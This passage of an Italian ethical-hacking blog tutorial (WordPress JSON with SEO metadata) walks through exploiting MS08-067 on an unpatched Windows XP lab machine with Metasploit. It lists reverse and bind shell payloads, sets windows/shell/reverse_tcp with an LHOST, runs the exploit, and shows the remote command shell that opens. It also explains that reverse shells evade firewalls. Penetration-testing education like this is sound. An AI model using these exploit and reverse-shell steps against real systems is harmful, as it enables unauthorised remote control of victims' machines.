windows\/vncinject\/bind_ipv6_tcp                                      normal  VNC Server (Reflective Injection), Bind IPv6 TCP Stager (Windows x86)\n   windows\/vncinject\/bind_ipv6_tcp_uuid                                 normal  VNC Server (Reflective Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)\n   windows\/vncinject\/bind_named_pipe                                    normal  VNC Server (Reflective Injection), Windows x86 Bind Named Pipe Stager\n   windows\/vncinject\/bind_nonx_tcp                                      normal  VNC Server (Reflective Injection), Bind TCP Stager (No NX or Win7)\n   windows\/vncinject\/bind_tcp                                           normal  VNC Server (Reflective Injection), Bind TCP Stager (Windows x86)\n   windows\/vncinject\/bind_tcp_rc4                                       normal  VNC Server (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)\n   windows\/vncinject\/bind_tcp_uuid                                      normal  VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x86)\n   windows\/vncinject\/reverse_hop_http                                   normal  VNC Server (Reflective Injection), Reverse Hop HTTP\/HTTPS Stager\n   windows\/vncinject\/reverse_http                                       normal  VNC Server (Reflective Injection), Windows Reverse HTTP Stager (wininet)\n   windows\/vncinject\/reverse_ipv6_tcp                                   normal  VNC Server (Reflective Injection), Reverse TCP Stager (IPv6)\n   windows\/vncinject\/reverse_nonx_tcp                                   normal  VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7)\n   windows\/vncinject\/reverse_ord_tcp                                    normal  VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)\n   windows\/vncinject\/reverse_tcp                                        normal  VNC Server (Reflective Injection), Reverse TCP Stager\n   windows\/vncinject\/reverse_tcp_allports                               normal  VNC Server (Reflective Injection), Reverse All-Port TCP Stager\n   windows\/vncinject\/reverse_tcp_dns                                    normal  VNC Server (Reflective Injection), Reverse TCP Stager (DNS)\n   windows\/vncinject\/reverse_tcp_rc4                                    normal  VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)\n   windows\/vncinject\/reverse_tcp_uuid                                   normal  VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support\n   windows\/vncinject\/reverse_udp                                        normal  VNC Server (Reflective Injection), Reverse UDP Stager with UUID Support\n\nmsf exploit(windows\/smb\/ms08_067_netapi) > \n<\/pre>\n<\/blockquote>\n<\/div>\n
Metasploit – Impostare manualmente un Payload<\/h4>\n
In questo esempio verr\u00e0 usato il Payload windows\/shell\/reverse_tcp<\/b> che permette di eseguire comandi da amministratore sulla macchina presa di mira. Ci sono due tipi di Shell, Bind Shells e Reverse Shells.
\nBIND SHELLS<\/b>
\nLa Bind Shell da istruzioni al target di eseguire una Shell e di ascoltare su una porta specifica. Il problema \u00e8 che ogni firewall \u00e8 configurato per default per bloccare tutto il traffico in entrata – tutte le porte – e quindi questa tecnica risulterebbe poco efficace.
\nREVERSE SHELLS<\/b>
\nCon una Reverse Shell \u00e8 l’attacker che ha una porta aperta e che funge da server, in questo modo si possono eludere le regole del firewall.<\/p>\n
Per usare un Payload eseguire il comando set payload<\/b> come segue:<\/p>\n
\n
\n
msf exploit(windows\/smb\/ms08_067_netapi) > set payload windows\/shell\/reverse_tcp\npayload => windows\/shell\/reverse_tcp\nmsf exploit(windows\/smb\/ms08_067_netapi) >\n<\/pre>\n<\/blockquote>\n<\/div>\n
Per vedere quali informazioni bisogna fornire al programma con questa nuova impostazione eseguire di nuovo il comando show options<\/b>.<\/p>\n
\n
\n
msf exploit(windows\/smb\/ms08_067_netapi) > show options\n\nModule options (exploit\/windows\/smb\/ms08_067_netapi):\n\n   Name     Current Setting  Required  Description\n   ----     ---------------  --------  -----------\n   RHOST    10.10.10.7       yes       The target address\n   RPORT    445              yes       The SMB service port (TCP)\n   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)\n\n\nPayload options (windows\/shell\/reverse_tcp):\n\n   Name      Current Setting  Required  Description\n   ----      ---------------  --------  -----------\n   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)\n   LHOST                      yes       The listen address (an interface may be specified)\n   LPORT     4444             yes       The listen port\n\n\nExploit target:\n\n   Id  Name\n   --  ----\n   45  Windows XP SP3 Italian (NX)\n\n\nmsf exploit(windows\/smb\/ms08_067_netapi) >\n<\/pre>\n<\/blockquote>\n<\/div>\n
Come si pu\u00f2 notare dall’output del comando bisogna inserire il proprio indirizzo IP – da dove si attacca la macchina Windows -, LHOST sta per local host.<\/p>\n
\n
\n
msf exploit(windows\/smb\/ms08_067_netapi) > set lhost 10.10.10.5\nlhost => 10.10.10.5\nmsf exploit(windows\/smb\/ms08_067_netapi) > show options\n\nModule options (exploit\/windows\/smb\/ms08_067_netapi):\n\n   Name     Current Setting  Required  Description\n   ----     ---------------  --------  -----------\n   RHOST    10.10.10.7       yes       The target address\n   RPORT    445              yes       The SMB service port (TCP)\n   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)\n\n\nPayload options (windows\/shell\/reverse_tcp):\n\n   Name      Current Setting  Required  Description\n   ----      ---------------  --------  -----------\n   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)\n   LHOST     10.10.10.5\t      yes       The listen address (an interface may be specified)\n   LPORT     4444             yes       The listen port\n\n\nExploit target:\n\n   Id  Name\n   --  ----\n   45  Windows XP SP3 Italian (NX)\n\n\nmsf exploit(windows\/smb\/ms08_067_netapi) >\n<\/pre>\n<\/blockquote>\n<\/div>\n
Ora abbiamo tutto quello che ci serve per potere eseguire l’exploit<\/b> con il Payload scelto con successo.<\/p>\n
Metasploit – Exploit<\/h3>\n
\n
\n
msf exploit(windows\/smb\/ms08_067_netapi) > exploit\n\n[*] Started reverse TCP handler on 10.10.10.5:4444 \n[*] 10.10.10.7:445 - Attempting to trigger the vulnerability...\n[*] Encoded stage with x86\/shikata_ga_nai\n[*] Sending encoded stage (267 bytes) to 10.10.10.7\n[*] Command shell session 1 opened (10.10.10.5:4444 -> 10.10.10.7:1037) at 2019-03-04 12:30:23 +0100\n\n\nC:\\WINDOWS\\system32>\n<\/pre>\n<\/blockquote>\n<\/div>\n
Come si pu\u00f2 vedere l’exploit ha avuto successo e appare un promt dei commandi di Windows con cui si pu\u00f2 fare praticamente qualsiasi cosa sulla macchina della vittima.<\/p>\n
Tratto in parte dal libro: Penetration Testing – a hands-on introduction to Hacking di Giorgia Weidman<\/h3>\n","protected":false},"excerpt":{"rendered":"
In questo esempio testeremo la sicurezza di un ipotetico client presente nella rete con un vecchio sistema operativo non aggiornato. L\u2019indirizzo IP del client da testare \u00e8 10.10.10.7, il sistema operativo in uso \u00e8 Windows XP PRO SP3 e non \u00e8 aggiornato. Ho scelto di proposito un sistema vecchio e non aggiornato per rendere pi\u00f9…<\/p>\n
Read More “Ethical Hacking – Testare la sicurezza – Nmap e Metasploit”<\/span> »<\/a><\/p>","protected":false},"author":5,"featured_media":1805,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[268,49,297],"tags":[259,21,10,12,281,282,285,261,283,286,284,110,157],"class_list":["post-1803","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-ethical-hacking-penetration-testing","category-sicurezza-informatica-anonimato","category-tutorials","tag-ethical-hacking","tag-exploit","tag-guida","tag-italiano","tag-kali-linux","tag-metasploit","tag-ms08-67","tag-nmap","tag-penetration-testing","tag-penetration-testing-a-hands-on-introduction-to-hacking","tag-sicurezza-informatica","tag-vulnerabilita","tag-windows"],"yoast_head":"\nEthical Hacking - Testare la sicurezza - Nmap e Metasploit • CHIT<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/christeninformatica.ch\/it\/testare-sicurezza-sistema-windows-nmap-metasploit-payloads-options-exploitation-penetration-testing-guida-italiano-ethical-hacking\/\" \/>\n<meta property=\"og:locale\" content=\"it_IT\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Ethical Hacking - Testare la sicurezza - Nmap e Metasploit • CHIT\" \/>\n<meta property=\"og:description\" content=\"In questo esempio testeremo la sicurezza di un ipotetico client presente nella rete con un vecchio sistema operativo non aggiornato. L\u2019indirizzo IP del client da testare \u00e8 10.10.10.7, il sistema operativo in uso \u00e8 Windows XP PRO SP3 e non \u00e8 aggiornato. Ho scelto di proposito un sistema vecchio e non aggiornato per rendere pi\u00f9...Read More “Ethical Hacking – Testare la sicurezza – Nmap e Metasploit” »\" \/>\n<meta property=\"og:url\" content=\"https:\/\/christeninformatica.ch\/it\/testare-sicurezza-sistema-windows-nmap-metasploit-payloads-options-exploitation-penetration-testing-guida-italiano-ethical-hacking\/\" \/>\n<meta property=\"og:site_name\" content=\"CHIT\" \/>\n<meta property=\"article:published_time\" content=\"2019-03-04T14:26:37+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2023-05-09T04:43:12+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/christeninformatica.ch\/media\/kali-linux-metasploit-exploit-penetration-testing-ethical-hacking.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"730\" \/>\n\t<meta property=\"og:image:height\" content=\"567\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"chitblog\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"chitblog\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"20 minuti\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/christeninformatica.ch\\\/testare-sicurezza-sistema-windows-nmap-metasploit-payloads-options-exploitation-penetration-testing-guida-italiano-ethical-hacking\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/christeninformatica.ch\\\/testare-sicurezza-sistema-windows-nmap-metasploit-payloads-options-exploitation-penetration-testing-guida-italiano-ethical-hacking\\\/\"},\"author\":{\"name\":\"chitblog\",\"@id\":\"https:\\\/\\\/christeninformatica.ch\\\/#\\\/schema\\\/person\\\/b0952e900860b424a6b0906f1d6a0a64\"},\"headline\":\"Ethical Hacking – Testare la sicurezza – Nmap e Metasploit\",\"datePublished\":\"2019-03-04T14:26:37+00:00\",\"dateModified\":\"2023-05-09T04:43:12+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/christeninformatica.ch\\\/testare-sicurezza-sistema-windows-nmap-metasploit-payloads-options-exploitation-penetration-testing-guida-italiano-ethical-hacking\\\/\"},\"wordCount\":772,\"commentCount\":0,\"image\":{\"@id\":\"https:\\\/\\\/christeninformatica.ch\\\/testare-sicurezza-sistema-windows-nmap-metasploit-payloads-options-exploitation-penetration-testing-guida-italiano-ethical-hacking\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/christeninformatica.ch\\\/media\\\/kali-linux-metasploit-exploit-penetration-testing-ethical-hacking.jpg\",\"keywords\":[\"ethical hacking\",\"exploit\",\"guida\",\"italiano\",\"Kali Linux\",\"Metasploit\",\"MS08-67\",\"Nmap\",\"Penetration testing\",\"Penetration Testing - a hands-on Introduction to Hacking\",\"sicurezza informatica\",\"vulnerabilit\u00e0\",\"windows\"],\"articleSection\":[\"Ethical Hacking \\\/ Penetration Testing\",\"Sicurezza \\\/ Anonimato\",\"Tutorials\"],\"inLanguage\":\"it-IT\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/christeninformatica.ch\\\/testare-sicurezza-sistema-windows-nmap-metasploit-payloads-options-exploitation-penetration-testing-guida-italiano-ethical-hacking\\\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/christeninformatica.ch\\\/testare-sicurezza-sistema-windows-nmap-metasploit-payloads-options-exploitation-penetration-testing-guida-italiano-ethical-hacking\\\/\",\"url\":\"https:\\\/\\\/christeninformatica.ch\\\/testare-sicurezza-sistema-windows-nmap-metasploit-payloads-options-exploitation-penetration-testing-guida-italiano-ethical-hacking\\\/\",\"name\":\"Ethical Hacking - Testare la sicurezza - Nmap e Metasploit • CHIT\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/christeninformatica.ch\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/christeninformatica.ch\\\/testare-sicurezza-sistema-windows-nmap-metasploit-payloads-options-exploitation-penetration-testing-guida-italiano-ethical-hacking\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/christeninformatica.ch\\\/testare-sicurezza-sistema-windows-nmap-metasploit-payloads-options-exploitation-penetration-testing-guida-italiano-ethical-hacking\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/christeninformatica.ch\\\/media\\\/kali-linux-metasploit-exploit-penetration-testing-ethical-hacking.jpg\",\"datePublished\":\"2019-03-04T14:26:37+00:00\",\"dateModified\":\"2023-05-09T04:43:12+00:00\",\"author\":{\"@id\":\"https:\\\/\\\/christeninformatica.ch\\\/#\\\/schema\\\/person\\\/b0952e900860b424a6b0906f1d6a0a64\"},\"breadcrumb\":{\"@id\":\"https:\\\/\\\/christeninformatica.ch\\\/testare-sicurezza-sistema-windows-nmap-metasploit-payloads-options-exploitation-penetration-testing-guida-italiano-ethical-hacking\\\/#breadcrumb\"},\"inLanguage\":\"it-IT\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/christeninformatica.ch\\\/testare-sicurezza-sistema-windows-nmap-metasploit-payloads-options-exploitation-penetration-testing-guida-italiano-ethical-hacking\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"it-IT\",\"@id\":\"https:\\\/\\\/christeninformatica.ch\\\/testare-sicurezza-sistema-windows-nmap-metasploit-payloads-options-exploitation-penetration-testing-guida-italiano-ethical-hacking\\\/#primaryimage\",\"url\":\"https:\\\/\\\/christeninformatica.ch\\\/media\\\/kali-linux-metasploit-exploit-penetration-testing-ethical-hacking.jpg\",\"contentUrl\":\"https:\\\/\\\/christeninformatica.ch\\\/media\\\/kali-linux-metasploit-exploit-penetration-testing-ethical-hacking.jpg\",\"width\":730,\"height\":567},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/christeninformatica.ch\\\/testare-sicurezza-sistema-windows-nmap-metasploit-payloads-options-exploitation-penetration-testing-guida-italiano-ethical-hacking\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/christeninformatica.ch\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Ethical Hacking – Testare la sicurezza – Nmap e Metasploit\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/christeninformatica.ch\\\/#website\",\"url\":\"https:\\\/\\\/christeninformatica.ch\\\/\",\"name\":\"CHIT\",\"description\":\"\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/christeninformatica.ch\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"it-IT\"},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/christeninformatica.ch\\\/#\\\/schema\\\/person\\\/b0952e900860b424a6b0906f1d6a0a64\",\"name\":\"chitblog\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"it-IT\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/321ffb3802ecc0a2fc461c52e31fbbabb19873df19bfb793c8e64c6a0cc49313?s=96&d=identicon&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/321ffb3802ecc0a2fc461c52e31fbbabb19873df19bfb793c8e64c6a0cc49313?s=96&d=identicon&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/321ffb3802ecc0a2fc461c52e31fbbabb19873df19bfb793c8e64c6a0cc49313?s=96&d=identicon&r=g\",\"caption\":\"chitblog\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Ethical Hacking - Testare la sicurezza - Nmap e Metasploit • CHIT","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/christeninformatica.ch\/it\/testare-sicurezza-sistema-windows-nmap-metasploit-payloads-options-exploitation-penetration-testing-guida-italiano-ethical-hacking\/","og_locale":"it_IT","og_type":"article","og_title":"Ethical Hacking - Testare la sicurezza - Nmap e Metasploit • CHIT","og_description":"In questo esempio testeremo la sicurezza di un ipotetico client presente nella rete con un vecchio sistema operativo non aggiornato. L\u2019indirizzo IP del client da testare \u00e8 10.10.10.7, il sistema operativo in uso \u00e8 Windows XP PRO SP3 e non \u00e8 aggiornato. Ho scelto di proposito un sistema vecchio e non aggiornato per rendere pi\u00f9...Read More “Ethical Hacking – Testare la sicurezza – Nmap e Metasploit” »","og_url":"https:\/\/christeninformatica.ch\/it\/testare-sicurezza-sistema-windows-nmap-metasploit-payloads-options-exploitation-penetration-testing-guida-italiano-ethical-hacking\/","og_site_name":"CHIT","article_published_time":"2019-03-04T14:26:37+00:00","article_modified_time":"2023-05-09T04:43:12+00:00","og_image":[{"width":730,"height":567,"url":"https:\/\/christeninformatica.ch\/media\/kali-linux-metasploit-exploit-penetration-testing-ethical-hacking.jpg","type":"image\/jpeg"}],"author":"chitblog","twitter_card":"summary_large_image","twitter_misc":{"Written by":"chitblog","Est. reading time":"20 minuti"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/christeninformatica.ch\/testare-sicurezza-sistema-windows-nmap-metasploit-payloads-options-exploitation-penetration-testing-guida-italiano-ethical-hacking\/#article","isPartOf":{"@id":"https:\/\/christeninformatica.ch\/testare-sicurezza-sistema-windows-nmap-metasploit-payloads-options-exploitation-penetration-testing-guida-italiano-ethical-hacking\/"},"author":{"name":"chitblog","@id":"https:\/\/christeninformatica.ch\/#\/schema\/person\/b0952e900860b424a6b0906f1d6a0a64"},"headline":"Ethical Hacking – Testare la sicurezza – Nmap e Metasploit","datePublished":"2019-03-04T14:26:37+00:00","dateModified":"2023-05-09T04:43:12+00:00","mainEntityOfPage":{"@id":"https:\/\/christeninformatica.ch\/testare-sicurezza-sistema-windows-nmap-metasploit-payloads-options-exploitation-penetration-testing-guida-italiano-ethical-hacking\/"},"wordCount":772,"commentCount":0,"image":{"@id":"https:\/\/christeninformatica.ch\/testare-sicurezza-sistema-windows-nmap-metasploit-payloads-options-exploitation-penetration-testing-guida-italiano-ethical-hacking\/#primaryimage"},"thumbnailUrl":"https:\/\/christeninformatica.ch\/media\/kali-linux-metasploit-exploit-penetration-testing-ethical-hacking.jpg","keywords":["ethical hacking","exploit","guida","italiano","Kali Linux","Metasploit","MS08-67","Nmap","Penetration testing","Penetration Testing - a hands-on Introduction to Hacking","sicurezza informatica","vulnerabilit\u00e0","windows"],"articleSection":["Ethical Hacking \/ Penetration Testing","Sicurezza \/ Anonimato","Tutorials"],"inLanguage":"it-IT","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/christeninformatica.ch\/testare-sicurezza-sistema-windows-nmap-metasploit-payloads-options-exploitation-penetration-testing-guida-italiano-ethical-hacking\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/christeninformatica.ch\/testare-sicurezza-sistema-windows-nmap-metasploit-payloads-options-exploitation-penetration-testing-guida-italiano-ethical-hacking\/","url":"https:\/\/christeninformatica.ch\/testare-sicurezza-sistema-windows-nmap-metasploit-payloads-options-exploitation-penetration-testing-guida-italiano-ethical-hacking\/","name":"Ethical Hacking - Testare la sicurezza - Nmap e Metasploit • CHIT","isPartOf":{"@id":"https:\/\/christeninformatica.ch\/#website"},"primaryImageOfPage":{"@id":"https:\/\/christeninformatica.ch\/testare-sicurezza-sistema-windows-nmap-metasploit-payloads-options-exploitation-penetration-testing-guida-italiano-ethical-hacking\/#primaryimage"},"image":{"@id":"https:\/\/christeninformatica.ch\/testare-sicurezza-sistema-windows-nmap-metasploit-payloads-options-exploitation-penetration-testing-guida-italiano-ethical-hacking\/#primaryimage"},"thumbnailUrl":"https:\/\/christeninformatica.ch\/media\/kali-linux-metasploit-exploit-penetration-testing-ethical-hacking.jpg","datePublished":"2019-03-04T14:26:37+00:00","dateModified":"2023-05-09T04:43:12+00:00","author":{"@id":"https:\/\/christeninformatica.ch\/#\/schema\/person\/b0952e900860b424a6b0906f1d6a0a64"},"breadcrumb":{"@id":"https:\/\/christeninformatica.ch\/testare-sicurezza-sistema-windows-nmap-metasploit-payloads-options-exploitation-penetration-testing-guida-italiano-ethical-hacking\/#breadcrumb"},"inLanguage":"it-IT","potentialAction":[{"@type":"ReadAction","target":["https:\/\/christeninformatica.ch\/testare-sicurezza-sistema-windows-nmap-metasploit-payloads-options-exploitation-penetration-testing-guida-italiano-ethical-hacking\/"]}]},{"@type":"ImageObject","inLanguage":"it-IT","@id":"https:\/\/christeninformatica.ch\/testare-sicurezza-sistema-windows-nmap-metasploit-payloads-options-exploitation-penetration-testing-guida-italiano-ethical-hacking\/#primaryimage","url":"https:\/\/christeninformatica.ch\/media\/kali-linux-metasploit-exploit-penetration-testing-ethical-hacking.jpg","contentUrl":"https:\/\/christeninformatica.ch\/media\/kali-linux-metasploit-exploit-penetration-testing-ethical-hacking.jpg","width":730,"height":567},{"@type":"BreadcrumbList","@id":"https:\/\/christeninformatica.ch\/testare-sicurezza-sistema-windows-nmap-metasploit-payloads-options-exploitation-penetration-testing-guida-italiano-ethical-hacking\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/christeninformatica.ch\/"},{"@type":"ListItem","position":2,"name":"Ethical Hacking – Testare la sicurezza – Nmap e Metasploit"}]},{"@type":"WebSite","@id":"https:\/\/christeninformatica.ch\/#website","url":"https:\/\/christeninformatica.ch\/","name":"CHIT","description":"","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/christeninformatica.ch\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"it-IT"},{"@type":"Person","@id":"https:\/\/christeninformatica.ch\/#\/schema\/person\/b0952e900860b424a6b0906f1d6a0a64","name":"chitblog","image":{"@type":"ImageObject","inLanguage":"it-IT","@id":"https:\/\/secure.gravatar.com\/avatar\/321ffb3802ecc0a2fc461c52e31fbbabb19873df19bfb793c8e64c6a0cc49313?s=96&d=identicon&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/321ffb3802ecc0a2fc461c52e31fbbabb19873df19bfb793c8e64c6a0cc49313?s=96&d=identicon&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/321ffb3802ecc0a2fc461c52e31fbbabb19873df19bfb793c8e64c6a0cc49313?s=96&d=identicon&r=g","caption":"chitblog"}}]}},"_links":{"self":[{"href":"https:\/\/christeninformatica.ch\/it\/wp-json\/wp\/v2\/posts\/1803","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/christeninformatica.ch\/it\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/christeninformatica.ch\/it\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/christeninformatica.ch\/it\/wp-json\/wp\/v2\/users\/5"}],"replies":[{"embeddable":true,"href":"https:\/\/christeninformatica.ch\/it\/wp-json\/wp\/v2\/comments?post=1803"}],"version-history":[{"count":0,"href":"https:\/\/christeninformatica.ch\/it\/wp-json\/wp\/v2\/posts\/1803\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/christeninformatica.ch\/it\/wp-json\/wp\/v2\/media\/1805"}],"wp:attachment":[{"href":"https:\/\/christeninformatica.ch\/it\/wp-json\/wp\/v2\/media?parent=1803"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/christeninformatica.ch\/it\/wp-json\/wp\/v2\/categories?post=1803"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/christeninformatica.ch\/it\/wp-json\/wp\/v2\/tags?post=1803"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}